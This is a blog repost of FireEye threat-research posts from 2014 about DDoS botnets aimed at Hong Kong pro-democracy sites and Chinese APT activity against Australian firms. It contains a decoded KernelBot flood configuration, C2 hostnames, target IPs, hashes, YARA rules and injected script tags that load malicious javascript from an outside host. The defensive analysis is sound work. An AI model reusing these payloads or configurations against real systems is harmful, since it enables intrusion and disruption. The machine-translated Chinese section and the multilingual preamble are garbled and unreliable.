2014年11月28日 星期五

---From "FireEye security research report, wary of international countries to defend your business carefully valuable property, or national intelligence, even for the same industry newspaper Apple Daily (DDoS) attack! *(1)*Operating poisoning switch : unveiling of APT relationship between Hong Kong's pro-democracy movement ** November 3, 2014 [according to 斯内德莫兰, 迈克奥 Oppenheim, Mike Scott,, threat intelligence, threat research ] - & - *(2)* over the network suppress silence dissent !(November 3, 2014 by Tony Cole morning,, threat intelligence, threat research) - & - *(3)*from the Chinese economic partner of Australia in the attack: a double-edged sword**( October 13, 2014, threat Intelligence,threat Research,,) - ---由"FireEye的安全硏究報告,警惕國際各國小心防衛你們的商業寶貴產權,或國家情報,甚至是針對蘋果日報的(DDoS)攻擊的同業界報社!*(1)*操作中毒切換:APT之間的揭幕活動的關係,香港的民運!**2014年11月3日 [按照 斯內德莫蘭,邁克奧本海姆,邁克·斯科特,,威脅智能感知系統,威脅研究 ]-&- *(2)*通過網絡抑制沉默異議! (2014年11月3日上午由托尼·科爾,,威脅智能感知系統,威脅研究) -&-*(3)*從中國經濟澳洲合作夥伴在攻擊:一把雙刃劍**(二零一四年十月十三日,威脅智能感知系統,,威脅研究)- **USA/UK/SEAOUL KOREAN/TW/MACAU(FDZ)/HKS/FR/JP/UKN/DE/FA/POL/VI/ESP`/CO/ARG/PY/MEX/MO/AUST./RU/HO/MAL/NW/CA/IT/PH/Swedis/Mongolian/TUR/Arabic/Latin/INDON./Greek/Dansk/THAI/......All the world lauguage**-


chn

---From "FireEye security research report, wary of international countries to defend your business carefully valuable property, or national intelligence, even for the same industry newspaper Apple Daily (DDoS) attack! *(1)*Operating poisoning switch : unveiling of APT relationship between Hong Kong's pro-democracy movement ** November 3, 2014 [according to 斯内德莫兰, 迈克奥 Oppenheim, Mike Scott,, threat intelligence, threat research ] - & - *(2)* over the network suppress silence dissent !(November 3, 2014 by Tony Cole morning,, threat intelligence, threat research) - & - *(3)*from the Chinese economic partner of Australia in the attack: a double-edged sword**( October 13, 2014, threat Intelligence,threat Research,,) -
---由"FireEye的安全硏究報告,警惕國際各國小心防衛你們的商業寶貴產權,或國家情報,甚至是針對蘋果日報的(DDoS)攻擊的同業界報社!*(1)*操作中毒切換:APT之間的揭幕活動的關係,香港的民運!**2014年11月3日 [按照 斯內德莫蘭,邁克奧本海姆,邁克·斯科特,,威脅智能感知系統,威脅研究 ]-&- *(2)*通過網絡抑制沉默異議!
(2014年11月3日上午由托尼·科爾,,威脅智能感知系統,威脅研究) -&-*(3)*從中國經濟澳洲合作夥伴在攻擊:一把雙刃劍**(二零一四年十月十三日,威脅智能感知系統,,威脅研究)-
 **USA/UK/SEAOUL KOREAN/TW/MACAU(FDZ)/HKS/FR/JP/UKN/DE/FA/POL/VI/ESP`/CO/ARG/PY/MEX/MO/AUST./RU/HO/MAL/NW/CA/IT/PH/Swedis/Mongolian/TUR/Arabic/Latin/INDON./Greek/Dansk/THAI/......All the world lauguage**-


-**Please use the god home use Google translator to translate the language of your country or city Oh ^^-
-**請各位用家善用谷歌大神的翻譯器,來翻譯你們的國家或城市的語言喔^^-
-**국가 또는 도시 ^^ 언어를 번역하는the 하나님의 가정에서 사용하는 구글 번역기를 사용하십시오-
-**Se il vous plaît utiliser l'utilisation de la maison de Dieu traducteur de Google pour traduire la langue de votre pays ou ville Oh ^^-
-**あなたの国や都市ああ^^の言語を翻訳するために神の家庭用のGoogle翻訳を使用してください -
-**Будь ласка, використовуйте бог домашнього використання перекладач Google перевести мову вашої країни або міста Oh ^^-
-**Bitte benutzen Sie den Gott den Heimgebrauch Google Übersetzer, um die Sprache Ihres Landes oder Stadt Oh ^^ übersetzen-
-**Käytäthe jumala kotikäyttöön Googlen kääntäjä kääntääthe kieli maata tai kaupunkia Oh ^^-
-**Proszę używać korzystania bóg startowej Google Translator przetłumaczyć język kraju lub miasta Oh ^^-
-**Vui lòng s dng vic s dng thn ch Google phiên dch đ dch các ngôn ng ca đt nước, thành ph ca bn Oh ^^-
-**Utilice el uso dios casa traductor de Google para traducir el idioma de su país o ciudad Oh ^^-
-**Utere deo, domum usu translator Google Translate to the language of patriae, civitatem O ^^-
-**Пожалуйста, используйте бог домашнего использования переводчик Google перевести язык вашей страны или города Oh ^^ -
-**Gebruik de god thuisgebruik Google vertaler naar de taal van uw land of stad Oh ^^ vertalen-
-**Sila gunakan digunakan di rumah tuhan penterjemah Google untuk menterjemahkan bahasa negara atau bandar anda Oh ^^-
-**Bruk gud hjemmebruk Google oversetter til å oversette språket i landet eller byen Oh ^^-
-**Si prega di utilizzare l'uso dio Home page di Google traduttore per tradurre la lingua del proprio paese o città Oh ^^-
-**Mangyaring gamitin ang bahay diyos paggamit tagasalin ng Google upang i-translate ang wika ng iyong bansa o lungsod Oh ^^-
-**Använd guden hemmabruk Google översättare att översätta språket i ditt land eller stad Oh ^^-
-**الرجاء استخدام استخدام إله المنزل مترجم جوجل لترجمة لغة بلدك أو المدينة أوه ^^-
- **Utere deo, domum usu translator Google Translate to the language of patriae, civitatem O ^^-
-**Silahkan gunakan penggunaan dewa rumah Google translator untuk menerjemahkan bahasa negara atau kota Oh ^^-
-**Brug venligst gud hjemmebrug Google oversætter til at oversætte sproget i dit land eller by Oh ^^-
-**Παρακαλώ χρησιμοποιήστε το θεό οικιακή χρήση του Google μεταφραστή να μεταφράσει τη γλώσσα της χώρας ή της πόλης σας Ω ^^-
-**กรุณาใช้theใช้งานที่บ้านพระเจ้าของ Google แปลที่จะแปลภาษาของประเทศหรือเมืองของคุณโอ้ ^^the-
-**Bonvolu uzi la dio hejmo uzo Google tradukisto por traduki la lingvon de via lando aŭ urbo Ho ^^- ** 


 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong's Pro-Democracy Movement

| By Ned Moran , Mike Oppenheim , Mike Scott | Threat Intelligence , Threat Research


 As the pro-democracy movement in Hong Kong has continued, we've been watching for indications of confrontation taking place in cyberspace. Protests began in September and have continued to escalate.
In recent weeks, attackers have launched a series of Distributed Denial of Service attacks (DDoS) against websites promoting democracy in Hong Kong. According to the Wall Street Journal, websites belonging to Next Media's Apple Daily publication have suffered from an ongoing DDoS attack that “brought down its email system for hours”. According to other reports, Next Media's network has suffered a “total failure” as a result of these attacks. Additionally, at least one member of the popular online forum HKGolden was arrested for posting messages encouraging support for the OccupyCentral Pro Democracy movement.
The use of DDoS attacks as a political tool during times of conflict is not new; patriotic hacktivist groups frequently use them as a means to stifle political activity of which they disapprove. The question of state sponsorship (or at least tacit approval) in online crackdowns is often up for debate and ambiguous from a technical evidence and tradecraft perspective.
In this case, however, we've discovered an overlap in the tools and infrastructure used by China-based advanced persistent threat (APT) actors and the DDoS attack activity. We believe that these DDoS attacks are linked to previously observed APT activity, including Operation Poisoned Hurricane. This correlation sheds light on the potential relationships, symbiosis and tool sharing between patriotic hacker activities designed to disrupt anti-government activists in China, and the APT activity we consistently see that is more IP theft and espionage-focused.
 

Ongoing DDoS Attacks Target the Pro-Democracy Movement

FireEye has identified a number of binaries coded to receive instructions from a set of command and control (C2) servers instructing participating bots to attack Next Media-owned websites and the HKGolden forum. Next Media is a large media company in Hong Kong and the HkGolden forum has been used as a platform to organize pro-democracy protests. Each sample we identified is signed with digital certificates that have also been used by APT actors to sign binaries in previous intrusion operations: MD5 Hash
These binaries are W32 Cabinet self-extracting files that drop a variant of an older DDoS tool known as KernelBot . All of the samples we identified have the “NewVersion” value of 20140926. Structurally, all of these samples are similar in that they drop three files: 
  • ctfmon.exe-a legitimate, signed copy of the Pidgin IM client   (md5 hash = 1685f978149d7ba8e039af9a4d5803c7) 

  • libssp-0.dll–malware DLL which is side-loaded by ctfmon.exe 

  to decode and launch KernelBot.  Most versions of this dll are also 

  signed by either the QTI or CallTogether certificate. 

  • readme.txt – a binary file which contains the XOR-encoded 

  KernelBot DLL as well as C2 destination information (most have 

  md5 hash of b5ac964a74091d54e091e68cecd5b532)
The KernelBot implants receive targeting instructions from C2 servers hard-coded directly into the sample. For example, c3d6450075d618b1edba17ee723eb3ca drops a KernelBot variant that connects to both www.sapporo-digital-photoclub[.]com and wakayamasatei[.]com. The full list of C2 servers we identified is as follows: 
  sapporo-digital-photoclub[.]com   wakayamasatei[.]com 

  tommo[.]jp 

  mizma.co[.]jp 

  sp.you-maga[.]com 

  nitori-tour[.]com 

  ninekobe[.]com 

  shinzenho[.]jp 

  wizapply[.]com 

  www.credo-biz[.]com
On Oct. 21, the control server at wakayamasatei[.]com responded with the following encoded configuration file: 
  @$@cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxonIGNZbkVdRGxDRk   94X0QaFxonIGlHTmNuGhcbJyBuRV1EbENGT3hfRH9YRhoXQl5eWhAFBRsaBBo 

  EGwQbHxsFGwRPUk8nIHF/Wk5LXk95T1hcT1h3JyBkT118T1hZQ0VEFxgaGx4 

  aExgcJyB/Wk5LXk9sQ0ZPf1hGF0JeXloQBQUbGgQaBBsEGx8bBRsET1JPJyBx 

  bm5leXViRVleeV5LXkNZXkNJWXcnIGlFX0Ref1hGFycgfkNHT1gXGCcgcW5uZ 

  Xl1eUlYQ1pebEZFRU53JyBjWXlJWENaXmxGRUVOFxsnIGlHTmNuFxsYGScgeU 

  lYQ1pebEZFRU5uZHkXJyB5SVhDWl5sRkVFTn9YRhdCXl5aEAUFRFJLWkMES1p 

  aRk9OS0NGUwRJRUcEQkEFJyB5SVhDWl5sRkVFTnpFWF4XEhonIGNZbU9ef1hG 

  bENGTxcbJyBjWXlPRE56S0lBT14XGicgfkJYT0tOZkVFWn5DR08XHycgfkJYT 

  0tOaUVfRF4XGxonIH5DR09YFxkcGicgY1l+Q0dPWBcbJyBxbm5leXV5SVhDWl 

  5sRkVFTnVrG3cnIGNZeUlYQ1pebEZFRU4XGicgaUdOY24XGycgeUlYQ1pebEZ 

  FRU5uZHkXGxoEGgQbBBsfGycgeUlYQ1pebEZFRU5/WEYXGxoEGgQbBBsfGwUb 

  BEJeR0YnIHlJWENaXmxGRUVOekVYXhcSGicgY1ltT15/WEZsQ0ZPFxsnIGNZe 

  U9ETnpLSUFPXhcbJyB+QlhPS05mRUVafkNHTxcbJyB+QlhPS05pRV9EXhcbJy 

  B+Q0dPWBcYGicgY1l+Q0dPWBcbJyBxbm5leXV/TlpsRkVFTncnIGNZf05abEZ 

  FRU4XGicgaUdOY24XGycgf05abEZFRU5uZHkXGxoEGgQbBBsfGycgfkJYT0tO 

  aUVfRF4XGycgfkNHT1gXGBonIGNZfkNHT1gXGycgcW5uZXl1f05abEZFRU51a 

  xt3JyBjWX9OWmxGRUVOFxonIGlHTmNuFxsnIH9OWmxGRUVObmR5FxsaBBoEGw 

  QbHxsnIH5CWE9LTmlFX0ReFxsnIH5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV 

  5dXlTRGxGRUVOdycgY1l5U0RsRkVFThcaJyBpR05jbhcbJyB5U0RsRkVFTm5k 

  eRcbGgQaBBsEGx8bJyB5U0RsRkVFTnpFWF4XEhonIH5CWE9LTmlFX0ReFxsnI 

  H5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV5dX5JWmxGRUVOdycgY1l+SVpsRk 

  VFThcaJyBpR05jbhcbJyB+SVpsRkVFTm5keRcbGgQaBBsEGx8bJyB+SVpsRkV 

  FTnpFWF4XEhonIGNZeU9ETnpLSUFPXhcbJyB+QlhPS05pRV9EXhcbJyB+Q0dP 

  WBcYGicgY1l+Q0dPWBcbJyBxbm5leXV+SVpsRkVFTnVrG3cnIGNZfklabEZFR 

  U4XGicgaUdOY24XGycgfklabEZFRU5uZHkXGxoEGgQbBBsfGycgfklabEZFRU 

  56RVheFxIaJyBjWXlPRE56S0lBT14XGycgfkJYT0tOaUVfRF4XHCcgfkNHT1g 

  XGBonIGNZfkNHT1gXGycg@$@
This configuration file can be decoded by stripping the leading and trailing @$@ characters. At this point, a simple base64 and XOR decode will reveal the plaintext configuration. The following snippet of python code can be used to decode this command: 
  b64encoded = request.content.rstrip('@$@').lstrip('@$@')   b64decoded = b64encoded.decode("base64") 

  command = "" 

  for c in b64decoded: 

  x = ord(c) 

  x = x ^ XOR_key 

  command += chr(x)
FireEye has observed two different single-byte XOR keys used to encode configuration files issued by the DDOS C2 servers in this campaign. The two different keys are 0x2A or 0x7E. The encoded configuration file shown above decodes to: 
  [KernelSetting]   IsReportState=0 

  IsDownFileRun0=0 

  CmdID0=1 

  DownFileRunUrl0=http://10.0.1.151/1.exe 

  [UpdateServer] 

  NewVersion=20140926 

  UpdateFileUrl=http://10.0.1.151/1.exe 

  [DDOS_HostStatistics] 

  CountUrl= 

  Timer=2 

  [DDOS_ScriptFlood] 

  IsScriptFlood=1 

  CmdID=123 

  ScriptFloodDNS= 

  ScriptFloodUrl=http://nxapi.appledaily.com.hk/ 

  ScriptFloodPort=80 

  IsGetUrlFile=1 

  IsSendPacket=0 

  ThreadLoopTime=5 

  ThreadCount=10 

  Timer=360 

  IsTimer=1 

  [DDOS_ScriptFlood_A1] 

  IsScriptFlood=0 

  CmdID=1 

  ScriptFloodDNS=10.0.1.151 

  ScriptFloodUrl=10.0.1.151/1.html 

  ScriptFloodPort=80 

  IsGetUrlFile=1 

  IsSendPacket=1 

  ThreadLoopTime=1 

  ThreadCount=1 

  Timer=20 

  IsTimer=1 

  [DDOS_UdpFlood] 

  IsUdpFlood=0 

  CmdID=1 

  UdpFloodDNS=10.0.1.151 

  ThreadCount=1 

  Timer=20 

  IsTimer=1 

  [DDOS_UdpFlood_A1] 

  IsUdpFlood=0 

  CmdID=1 

  UdpFloodDNS=10.0.1.151 

  ThreadCount=1 

  Timer=20 

  IsTimer=1 

  [DDOS_SynFlood] 

  IsSynFlood=0 

  CmdID=1 

  SynFloodDNS=10.0.1.151 

  SynFloodPort=80 

  ThreadCount=1 

  Timer=20 

  IsTimer=1 

  [DDOS_TcpFlood] 

  IsTcpFlood=0 

  CmdID=1 

  TcpFloodDNS=10.0.1.151 

  TcpFloodPort=80 

  IsSendPacket=1 

  ThreadCount=1 

  Timer=20 

  IsTimer=1 

  [DDOS_TcpFlood_A1] 

  IsTcpFlood=0 

  CmdID=1 

  TcpFloodDNS=10.0.1.151 

  TcpFloodPort=80 

  IsSendPacket=1 

  ThreadCount=6 

  Timer=20 

  IsTimer=1
During the course of our research, we've observed more than 30 different unique configuration files issued by the C2 servers listed above. These configurations issued commands to attack the following domains and IPs: 
  nxapi.appledaily.com[.]hk   202.85.162.90 

  58.64.139.10 

  202.85.162.97 

  202.85.162.81 

  198.41.222.6 

  202.85.162.101 

  202.85.162.95 

  202.85.162.180 

  202.85.162.140 

  202.85.162.130 

  124.217.214.149
All of the above IPs host Next Media or Apple daily websites, with the exception of 58.64.139.10 and 124.217.214.149. The IP 58.64.139.10 has hosted hkgolden[.]com - the domain for the HKGolden forum mentioned above.
For approximately 14 hours between October 23rd and 24th, the attackers pushed a configuration update to four controls servers that instructed bots under their control to flood 124.217.214.149 with UDP traffic. The IP 124.217.214.149 hosted the attacker controlled domain p.java-sec[.]com.
On Oct. 23, 2014, two of the active controls began instructing participating bots to cease attacks. By Oct. 24, 2014, all five of the known active control servers were issuing commands to cease the attacks.
It should come as no surprise that hkgolden[.]com, nextmedia[.]com, and appledaily.com[.]hk websites are now or previously have been blocked by the Great Firewall of China – indicating that the PRC has found the content hosted on these sites objectionable.

Links to Previous Activity

The most direct connection between these DDoS attacks and previous APT activity is the use of the QTI International and CallTogether code signing certificates, which we have seen in malware attributed to APT activity.
The QTI International digital certificate has been previously used to sign binaries used in APT activity including Operation Poisoned Hurricane. Specifically, 17bc9d2a640da75db6cbb66e5898feb1 is a PlugX variant signed by the QTI International certificate. This PlugX variant connected to a Google Code project at code.google[.]com/p/udom/, where it decoded a command that configured its C2 server.
The sample 0b54ae49fd5a841970b98a078968cb6b was signed with the QTI International certificate as well. This sample was first observed during a drive-by attack in June 2014, and was downloaded from java-se[.]com/jp.jpg. This sample is detected as Backdoor.APT.Preshin and connected to luxscena[.]com for C2.
The QTI International certificate was also used to sign e2a4b96cce9de4fb126cfd5f5c73c3ed. We detect this payload as Backdoor.APT.PISCES and it used hk.java-se[.]com for C2. The java-se[.]com website was previously used in other attacks targeting the pro-democracy movement in Hong Kong. We first observed the presence of malicious javascript inserted into Hong Kong Association for Democracy and People's Livelihood on June 26, 2014, which appeared as the following: 
  <a href="http://www.adpl.org.hk/?p=2680" title="抗議九巴加價要求凍結加價、改善服務   <script language=javascript src=http://java-se.com/o.js></script>">
More recently, as noted by Claudio Guarnieri, the website of the Democratic Party of Hong Kong was seen hosting a redirect to the same malicious javascript.
The CallTogether certificate has been used to sign ecf21054ab515946a812d1aa5c408ca5. We also detect this payload as Backdoor.APT.PISCES and observed it connect to u.java-se[.]com.
Both of these certificates are valid but can be detected and blocked via the following Yara signatures: 
  rule callTogether_certificate   { 

  meta: 

  author = "Fireeye Labs" 

  version = "1.0" 

  reference_hash = "d08e038d318b94764d199d7a85047637" 

  description = “detects binaries signed with the CallTogether certificate” 

  strings: 

  $serial = {452156C3B3FB0176365BDB5B7715BC4C} 

  $o = "CallTogether, Inc." 

  condition: 

  $serial and $o 

  } 

  rule qti_certificate 

  { 

  meta: 

  author = "Fireeye Labs" 

  reference_hash = "cfa3e3471430a0096a4e7ea2e3da6195" 

  description = "detects binaries signed with the QTI International Inc certificate" 

  strings: 

  $cn = "QTI International Inc" 

  $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 } 

  condition: 

  $cn and $serial 

  }
These ongoing DDoS attacks and previous APT intrusion activity both target the hkgolden[.]com website. As noted above, this site has been targeted with a DDoS attack by a KernelBot network. We also found that the hkgolden[.]com website was compromised on Sept. 5, 2014 and had a redirect to a malicious javascript again hosted at another jave-se[.]com host, which appeared as follows: 
  document.write("<script language=javascript src=http://jre76.java-se.com/js/rss.js></script>
Finally, as noted above the IP 124.217.214.149 was seen hosting the domain p.java-sec[.]com between Oct. 25, 2014 and Oct. 27, 2014. As Brandon Dixon noted here , the java-sec[.]com domain is linked to the java-se[.]com by shared hosting history at the following IP address: 
  124.248.237.26   223.29.248.9 

  211.233.89.182 

  112.175.143.2 

  112.175.143.9
It is unclear why these actors would attack an IP address they were actively using. It's possible that the attackers wanted to test their botnet's capability by attacking an IP they were using to gather statistics on the size of the attack. It is also possible that the attackers simply made a mistake and accidentally issued commands to attack their own infrastructure. On Oct. 24, 2014, after attacking their own infrastructure, the attackers issued new instructions to their botnet that ceased all attacks.

Conclusion

While not conclusive, the evidence presented above shows a link between confirmed APT activity and ongoing DDoS attacks that appear to be designed to silence the Pro Democracy movement in Hong Kong . The evidence does not conclusively prove that the same actors responsible for the DDoS attacks are also behind the observed intrusion activity discussed above – such as Operation Poisoned Hurricane. Rather, the evidence may indicate that a common quartermaster supports both the DDoS attacks and ongoing intrusion activity.
In either scenario, there is a clear connection between the intrusion activity documented in Operation Poisoned Hurricane and the DDOS attacks documented here. While the tactics of these activities are very different from a technical perspective, each supports distinct political objectives. Operation Poisoned Hurricane's objective appeared to have in part been IP theft possibly for economic gain or other competitive advantages. In the DDOS attacks, the objective was to silence free speech and suppress the pro democracy movement in Hong Kong. The Chinese government is the entity most likely to be interested in achieving both of these objectives.

APPENDIX

MD5s 
  c3d6450075d618b1edba17ee723eb3ca   d08e038d318b94764d199d7a85047637 

  84bd0809b1dbc2dc86f30d30faaa7e4e 

  39bb90140fc0101f49377b6c60076f9d 

  caa5529010c17b969da01ade084794c6 

  17bc9d2a640da75db6cbb66e5898feb1 

  0b54ae49fd5a841970b98a078968cb6b 

  e2a4b96cce9de4fb126cfd5f5c73c3ed 

  ecf21054ab515946a812d1aa5c408ca5
HOSTNAMES 
  tommo[.]jp   mizma.co[.]jp 

  sp.you-maga[.]com 

  nitori-tour[.]com 

  ninekobe[.]com 

  shinzenho[.]jp 

  wizapply[.]com 

  www.credo-biz[.]com 

  www.sapporo-digital-photoclub[.]com 

  wakayamasatei[.]com 

  luxscena[.]com 

  java-se[.]com 

  hk.java-se[.]com 

  u.java-se[.]com 

  jre76.java-se[.]com 

  p.java-sec[.]com
This entry was posted on Mon Nov 03 08:00:23 EST 2014 and filed under Advanced Malware , Blog , Cybersecurity , Malware , Mike Oppenheim , Mike Scott , Ned Moran , Threat Intelligence ,
 Threat Research and Zero-day .


 =====================================================
  http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Silencing Dissent via Cyber Suppression

| By Tony Cole | Threat Intelligence , Threat Research

 Today, our Labs team released a blog called 'Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong's Pro-Democracy Movement.' Clearly, the Chinese government has identified social media and uncontrolled information as a major threat. The linkage between probable Chinese hackers responsible for a number of Advanced Persistent Threat (APT) attacks around intellectual property theft and the ongoing Distributed Denial of Service attacks against the Pro Democracy movement in Hong Kong makes sense. The Chinese government is utilizing their deep hacking expertise garnered to shut down any online systems hosting information pertaining to and supporting the Pro-Democracy Movement in Hong Kong. All the while, they continue to shut down Social Media via the Great FireWall of China and thereby limit access to information on the Internet.
Unrestricted access to social media can allow the for the instantaneous spread of information, new concepts, and most importantly, unrest. Most notably, the Arab Spring, which began on December 18th and quickly spread via social media causing protests and uprisings that reverberated around the region. By the end of 2013, numerous rulers had been forced from power in the Middle East. It was a powerful tool for protesters to use to organize and publicly let the world know what their government was doing to silence them.
Most governments typically don't like widespread dissent. It makes running a country more difficult when a significant percentage of the population isn't happy with specific policies or practices that make the current ruling party look bad to the rest of the world. In a free and open society dissent is much more accepted and practiced openly and usually receives a lot of press and the government has no choice but to accept it. In a closed society where dissent is either not allowed or closely controlled, the media is the enemy during a protest since the government does not want the world to see any unrest and they don't want it known across their country lest the trouble spread. This is why the general population has limited access to online information except for what the government wants them to see. And with the DDoS revelations today, we see how governments not just block access but go a step further to keep the status quo in place.
This entry was posted on Mon Nov 03 08:05:04 EST 2014 and filed under Advanced Threats , Blog , Cybersecurity , Fireeye , Social Media , Threat Intelligence , Threat Research and Tony Cole .


 =======================================================
 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

Double-edged Sword: Australia Economic Partnerships Under Attack from China

| | Threat Intelligence , Threat Research

 During a visit in mid-September, China's Foreign Minister Wang Yi urged Australia to become “a bridge between east and west.” He was Down Under to discuss progress on the free trade agreement between Australia and China that seems likely by the end of the year. His comment referred to furthering the trade relationship between the two countries, but he might as well have been referring to hackers who hope to use the deepening alliance to steal information.
The Australian Financial Review (AFR) did an in-depth article with FireEye regarding Chinese attacks against Australian businesses, and this blog provides additional context.
Australia has experienced unprecedented trade growth with China over the last decade, which has created a double-edged sword. As Australian businesses partner with Chinese firms, Chinese-based threat actors increasingly launch sophisticated and targeted network attacks to obtain confidential information from Australian businesses. In the US and Europe, Chinese attacks on government and private industry have become a routine in local newspapers. Australia, it seems, is the next target.
The Numbers
First, let's review the state of Australian and Chinese economic interdependence. Averaging an annual 9.10% GDP growth rate over the last two decades, China's unparalleled economic expansion has protected Australia from the worst of the global financial crisis effects . Exports to China have increased tenfold, from $8.3b USD in 2001 to $90b USD in 2013[i], with the most prominent commodities being iron ore and natural gas . Much of these resources originate in Australia, which puts China's government under significant pressure to meet the skyrocketing demand for them. Despite the ever-increasing co-dependence Australia and China share as regional partners, Chinese authorities are likely supporting greater levels of monitoring and intelligence gathering from the Australian economy - often conducted through Chinese State-Owned Enterprises (SOEs) with domestic relationships in Australia.
SOE direct investment into Australia grew to 84% of all foreign investment inflows from China in 2014, primarily directed into the Australian mining and resource sector; demonstrating a further signal for control as China seeks to capture a level of certainty in catering for its future internal growth. We suspect this to be government-commissioned cyber threat actors targeting Australian firms with a specific agenda: to gain advantage and control of assets both in physical infrastructure and intellectual property.
chn
Figure 1. Chinese Direct Investment into Australia by industry
The Impacts
How have these partnerships impacted Australian networks? Mandiant has observed the strategic operations of Chinese threat actors target companies involved in key economic sectors, including data theft from an Australian firm. Chinese Advanced Persistent Threats (APTs) are likely interested in compromising Australian mining and natural resources firms, especially after spikes in commodity prices. The upward trend in APT attacks from China is also aimed toward the third parties in the mining and natural resources ecosystems. Mandiant believes a significant increase in China-based APT intrusions focused on law firms that hold confidential mergers and acquisitions information and sensitive intellectual property. It is no coincidence these third-party firms are often found lacking in network protections. The investigation also found that, at the time of compromise, the majority of victim firms were in direct negotiations with Chinese enterprises, highlighting attempts by the Chinese government to gain advantage in targeted areas.
Due to its endemic pollution problems, clean energy has evolved into a critical industry for China. The country has now engaged a plan to develop Strategic Emerging Industries (SEIs) to address this. Australian intellectual property and R&D have become prime data, and has taken a major position in Chinese APT campaigns. Again, it is the third parties like law firms that are coming under attack.
Furthermore, to reduce China's reliance on Australian iron ore exports, Beijing has initiated a plan to develop an efficient, high-end steel production vertical through strategic acquisitions in Australia and intervening to prevent unfavorable alliances. For example, the SOE Chinalco bought into Australian mining companies to presumably prevent a merger that would have disadvantaged their interests. Clearly, the confidential business information of Australian export partners to China is becoming increasingly sought after .
Mandiant found that the majority of compromised firms had either current negotiation with Chinese enterprises or previous business engagements with Chinese enterprises. These attacks will persist as trade and investment grows, though they will do so at the cost of confidential Australian business information such as R&D and intellectual property. As large Australian mining and resources firms themselves may partner with the Australian Signals Directorate for security, the focus of the threat actors shifts to associated parties with access to sensitive data, who may not be pursuing partnerships with the Australian Signals Directorate. This calls for greater awareness and protection against the increasingly determined and advanced attacks launched.
The Bottom Line
Although this blog focuses on acts against large Australian mining and resources sectors, Mandiant has observed these APT actors often focusing their attention on other sectors such as defence, telecommunications, agriculture, political organizations, high technology, transportation, and aerospace, among others. But the broader lesson and message—drawing from US and European experience with Chinese attacks—is that no one is or will be exempt. For all Australian businesses and governments, it's time to fortify defences for a new era of cyber security.
[i]"Australian Government Department of Foreign Trade and Affairs. www.dfat.gov.au/publications/stats-pubs/australiasexports-
This entry was posted on Mon Oct 13 19:00:49 EDT 2014 and filed under Advanced Malware , Advanced Persistent Threat , Blog , Cyber Attack , Cybersecurity , Mandiant , Threat Intelligence and Threat Research .


 ===============================================================
  http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

操作中毒切換:APT之間的揭幕活動的關係,香港的民運

|按照 斯內德莫蘭邁克奧本海姆邁克·斯科特 | 威脅智能感知系統
 威脅研究

 作為香港的民運一直在繼續,我們也一直在關注的跡象對抗發生在網絡空間。 抗議活動開始於九月繼續升級。
在最近幾週,攻擊者已經推出了一系列分佈式拒絕服務攻擊(DDoS)攻擊對網站推廣香港的民主。 根據華爾街日報,屬於壹傳媒的蘋果日報出版的網站都遭受了持續的DDoS攻擊是“打倒了幾個小時的電子郵件系統”。 另據報導,壹傳媒的網絡已經遭遇了“徹底失敗”作為這些攻擊的結果。 此外,流行的在線論壇HKGolden至少有一名成員涉嫌發布消息鼓勵了OccupyCentral臨民主運動的支持。
利用DDoS攻擊作為在衝突時期的政治工具是不是新的; 愛國黑客行動主義團體經常利用它們作為一種手段來扼殺它,他們不贊成政治活動。 國家贊助(或至少是默許),在網上鎮壓的問題往往是為辯論而曖昧從技術證據和諜報觀點。
在這種情況下,但是,我們已經發現在使用中國的高級持續性威脅(APT)的演員和DDoS攻擊活動的工具和基礎架構的重疊。 我們相信,這些DDoS攻擊都與以前觀察到的APT活動,包括操作中毒颶風。 這種相關性揭示了旨在破壞反政府活動人士在中國愛國黑客活動之間的潛在關係,共生和工具共享輕,我們始終看到APT活動更加IP盜竊和間諜行為為重點。

正在進行的DDoS攻擊目標的民運

FireEye已經確定了一些二進制編碼,從一組指揮和控制(C2)服務器指示參與機器人攻擊壹傳媒擁有網站和HKGolden論壇收到指令。 壹傳媒是一家大型媒體公司在香港和HkGolden論壇已被用作一個平台,組織親民主抗議活動。 每個我們確定樣品與也被用來通過APT參與者登錄先前侵入操作二進制數字證書簽名的: MD5哈希
這些二進制文件是下降的舊DDoS攻擊工具被稱為KernelBot變種W32內閣自解壓文件。 我們所確定的樣本有20140926.的“動態網頁”的值在結構上,這些樣品是相似的,他們砸三個文件: 
  •Ctfmon.exe會-一洋涇浜的IM客戶端的合法簽署的副本   (MD5哈希= 1685f978149d7ba8e039af9a4d5803c7) 

  •libssp-0.dll惡意DLL是側面裝載了CTFMON.EXE 

 解碼和啟動KernelBot。 在大多數版本的此DLL也 

 不論是由QTI或CallTogether證書簽名。 

  •自述 - 一個二進制文件,其中包含的異或編碼 

  KernelBot DLL以及C2目的地信息(最有 

  b5ac964a74091d54e091e68cecd5b532的MD5哈希值)
所述KernelBot植入接收靶向選自C 2服務器直接硬編碼到樣品的說明。 例如,c3d6450075d618b1edba17ee723eb3ca滴KernelBot變體連接到這兩個www.sapporo-數字photoclub [。]玉米和wakayamasatei [。]玉米。 是C2服務器,我們確定的名單如下: 
 札幌數字photoclub [。]玉米   wakayamasatei [。]玉米 

  tommo [。] JP 

  mizma.co [。] JP 

  sp.you-馬夾[。]玉米 

  NITORI遊[。]玉米 

  ninekobe [。]玉米 

  shinzenho [。] JP 

  wizapply [。]玉米 

  www.credo-BIZ [。]玉米
[] 10月21日,在wakayamasatei控制服務器COM回應以下編碼配置文件: 
  @ $ @ cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxonIGNZbkVdRGxDRk   94X0QaFxonIGlHTmNuGhcbJyBuRV1EbENGT3hfRH9YRhoXQl5eWhAFBRsaBBo 

